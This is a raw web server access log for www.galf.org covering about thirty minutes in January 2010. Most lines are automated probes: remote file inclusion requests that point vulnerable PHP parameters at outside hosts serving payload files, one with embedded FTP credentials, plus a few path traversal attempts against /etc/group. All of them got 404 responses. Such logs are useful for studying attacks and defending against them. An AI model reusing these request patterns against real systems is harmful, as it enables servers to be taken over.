72.55.146.200 - - [04/Jan/2010:05:37:56 -0800] "GET /errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:05:37:56 -0800] "GET /logs/access_091228.log//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:05:37:56 -0800] "GET /logs//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:05:37:57 -0800] "GET /logs//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:05:37:59 -0800] "GET /errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:05:38:00 -0800] "GET /logs/access_091228.log//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:38:21 -0800] "GET /logs/access_090824.log%20%20//includes/functions_portal.php?phpbb_root_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [04/Jan/2010:05:39:10 -0800] "GET /logs/access_091228.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:05:39:33 -0800] "GET /logs/access_090824.log//includes/functions_portal.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:05:39:35 -0800] "GET /logs/access_091228.log//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:05:39:35 -0800] "GET /errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:05:39:36 -0800] "GET /logs//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:05:40:03 -0800] "GET /logs/access_090824.log//includes/functions_portal.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:05:40:25 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:05:40:25 -0800] "GET /logs/access_090824.log%20%20//admin/business_inc/saveserver.php?thisdir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:05:40:25 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:05:40:29 -0800] "GET /logs/access_090907.log%20%20//admin/business_inc/saveserver.php?thisdir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:05:40:47 -0800] "GET /logs/access.log//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.190.166.35 - - [04/Jan/2010:05:40:47 -0800] "GET /errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.190.166.35 - - [04/Jan/2010:05:40:47 -0800] "GET /logs//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.190.166.35 - - [04/Jan/2010:05:42:04 -0800] "GET /logs/access_091228.log%20%20//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:05:42:04 -0800] "GET /errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:05:42:04 -0800] "GET /logs//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [04/Jan/2010:05:42:16 -0800] "GET /logs/access_091221.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:05:42:45 -0800] "GET /logs/access.log//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.146.200 - - [04/Jan/2010:05:42:45 -0800] "GET /errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.146.200 - - [04/Jan/2010:05:42:45 -0800] "GET /logs//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [04/Jan/2010:05:43:39 -0800] "GET /logs/access_090615.log/home.php?pagina=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [04/Jan/2010:05:43:39 -0800] "GET /logs/home.php?pagina=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [04/Jan/2010:05:43:39 -0800] "GET /home.php?pagina=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:05:44:05 -0800] "GET /logs/access_091228.log//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:05:44:05 -0800] "GET /logs//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:05:44:05 -0800] "GET /errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [04/Jan/2010:05:44:08 -0800] "GET /logs/access_090615.log%20%20/home.php?pagina=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [04/Jan/2010:05:44:18 -0800] "GET /logs/access_090629.log%20%20/home.php?pagina=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:05:44:52 -0800] "GET /errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.146.200 - - [04/Jan/2010:05:44:52 -0800] "GET /logs//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.146.200 - - [04/Jan/2010:05:44:52 -0800] "GET /logs/access.log//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.190.166.35 - - [04/Jan/2010:05:45:03 -0800] "GET /errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.190.166.35 - - [04/Jan/2010:05:45:03 -0800] "GET /logs//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.190.166.35 - - [04/Jan/2010:05:45:03 -0800] "GET /logs/access.log//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
71.250.232.26 - - [04/Jan/2010:05:45:19 -0800] "GET /logs/access_091221.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.255.101 - - [04/Jan/2010:05:45:57 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
222.239.255.101 - - [04/Jan/2010:05:45:57 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
222.239.255.101 - - [04/Jan/2010:05:46:00 -0800] "GET /logs/access_090713.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
222.239.255.101 - - [04/Jan/2010:05:46:47 -0800] "GET /logs/access_090914.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
83.176.248.69 - - [04/Jan/2010:05:47:10 -0800] "GET /labia/ HTTP/1.1" 200 524 "http://www.google.se/search?hl=sv&source=hp&q=INDEX+of%2F%2Flabia&btnG=Google-s%C3%B6kning&meta=&aq=f&oq=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.galf.org"
83.176.248.69 - - [04/Jan/2010:05:47:11 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.galf.org"
189.72.17.151 - - [04/Jan/2010:05:47:35 -0800] "GET /home.php?pagina=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [04/Jan/2010:05:47:35 -0800] "GET /logs/access_090615.log/home.php?pagina=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [04/Jan/2010:05:47:35 -0800] "GET /logs/home.php?pagina=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.4.32.137 - - [04/Jan/2010:05:47:42 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.4.32.137 - - [04/Jan/2010:05:47:42 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.4.32.137 - - [04/Jan/2010:05:47:42 -0800] "GET /logs/access_090622.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:05:47:58 -0800] "GET /logs/access_090824.log//admin/business_inc/saveserver.php?thisdir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:05:47:58 -0800] "GET /logs/access_090907.log//admin/business_inc/saveserver.php?thisdir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [04/Jan/2010:05:48:01 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.biasy.net//modules/news_afp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [04/Jan/2010:05:48:01 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.biasy.net//modules/news_afp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [04/Jan/2010:05:48:01 -0800] "GET /logs/access_091012.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.biasy.net//modules/news_afp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [04/Jan/2010:05:48:03 -0800] "GET /logs/access_090615.log%20%20/home.php?pagina=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.4.32.137 - - [04/Jan/2010:05:48:04 -0800] "GET /logs/access_090706.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [04/Jan/2010:05:48:07 -0800] "GET /logs/access_090803.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.biasy.net//modules/news_afp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [04/Jan/2010:05:48:19 -0800] "GET /logs/access_090629.log%20%20/home.php?pagina=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:05:48:55 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:05:48:55 -0800] "GET /logs/access_090706.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:05:48:55 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:05:48:59 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:05:48:59 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:05:49:00 -0800] "GET /logs/access_090706.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [04/Jan/2010:05:50:06 -0800] "GET /logs/access_090921.log/home.php?pagina=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [04/Jan/2010:05:50:36 -0800] "GET /logs/access_090629.log/home.php?pagina=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:05:51:08 -0800] "GET /logs//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.148.238.69 - - [04/Jan/2010:05:51:08 -0800] "GET /errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.148.238.69 - - [04/Jan/2010:05:51:08 -0800] "GET /logs/access.log//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.194.26 - - [04/Jan/2010:05:51:32 -0800] "GET /logs/access_091207.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:05:51:48 -0800] "GET /logs/access_091207.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.231 - - [04/Jan/2010:05:52:30 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:05:53:57 -0800] "GET /logs/access_090824.log//admin/business_inc/saveserver.php?thisdir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:05:53:57 -0800] "GET /logs/access_090907.log//admin/business_inc/saveserver.php?thisdir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [04/Jan/2010:05:54:03 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.qqe.ru/forum/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [04/Jan/2010:05:54:03 -0800] "GET /logs/access_091116.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.qqe.ru/forum/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [04/Jan/2010:05:54:03 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.qqe.ru/forum/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [04/Jan/2010:05:56:28 -0800] "GET /docs/front-end-demo/cart2.php?workdir=http://www.biasy.net//modules/news_afp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [04/Jan/2010:05:56:28 -0800] "GET /logs/access_091228.log%20%20/docs/front-end-demo/cart2.php?workdir=http://www.biasy.net//modules/news_afp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [04/Jan/2010:05:56:28 -0800] "GET /logs/docs/front-end-demo/cart2.php?workdir=http://www.biasy.net//modules/news_afp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.4.32.137 - - [04/Jan/2010:05:57:35 -0800] "GET /logs/access_090622.log//faqsupport/samplefaqsupport.php?path[docroot]=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.4.32.137 - - [04/Jan/2010:05:57:46 -0800] "GET /logs/access_090706.log//faqsupport/samplefaqsupport.php?path[docroot]=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.58.130 - - [04/Jan/2010:05:59:21 -0800] "GET /logs/access_091012.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ottoebeyer.com/tools/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [04/Jan/2010:05:59:30 -0800] "GET /logs/access_091214.log%20%20/docs/front-end-demo/cart2.php?workdir=http://www.biasy.net//modules/news_afp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [04/Jan/2010:06:00:03 -0800] "GET /logs/access_091207.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [04/Jan/2010:06:00:03 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [04/Jan/2010:06:00:03 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [04/Jan/2010:06:00:15 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [04/Jan/2010:06:00:16 -0800] "GET /logs/access_091207.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [04/Jan/2010:06:00:16 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [04/Jan/2010:06:01:07 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [04/Jan/2010:06:01:07 -0800] "GET /logs/access_091207.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [04/Jan/2010:06:01:07 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.58.130 - - [04/Jan/2010:06:01:37 -0800] "GET /logs/access_091012.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ottoebeyer.com/tools/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [04/Jan/2010:06:02:43 -0800] "GET /logs/access_090629.log/home.php?pagina=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.131.106.16 - - [04/Jan/2010:06:03:10 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [04/Jan/2010:06:03:10 -0800] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
200.93.147.154 - - [04/Jan/2010:06:03:14 -0800] "GET /logs/access_090525.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [04/Jan/2010:06:04:46 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [04/Jan/2010:06:04:46 -0800] "GET /logs/access_090810.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [04/Jan/2010:06:04:46 -0800] "GET /logs/access_091221.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [04/Jan/2010:06:04:47 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [04/Jan/2010:06:05:01 -0800] "GET /logs/access_091221.log/home.php?pagina=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.231 - - [04/Jan/2010:06:06:22 -0800] "GET /cendoc/?D=D HTTP/1.1" 200 526 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
189.72.17.151 - - [04/Jan/2010:06:07:30 -0800] "GET /logs/access_090921.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [04/Jan/2010:06:07:30 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [04/Jan/2010:06:07:30 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.53.110.2 - - [04/Jan/2010:06:09:32 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.53.110.2 - - [04/Jan/2010:06:09:33 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:06:12:09 -0800] "GET /administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:06:12:09 -0800] "GET /logs/access_091123.log//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:06:12:09 -0800] "GET /logs//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:06:12:17 -0800] "GET /administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:06:12:17 -0800] "GET /logs/access_091123.log//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
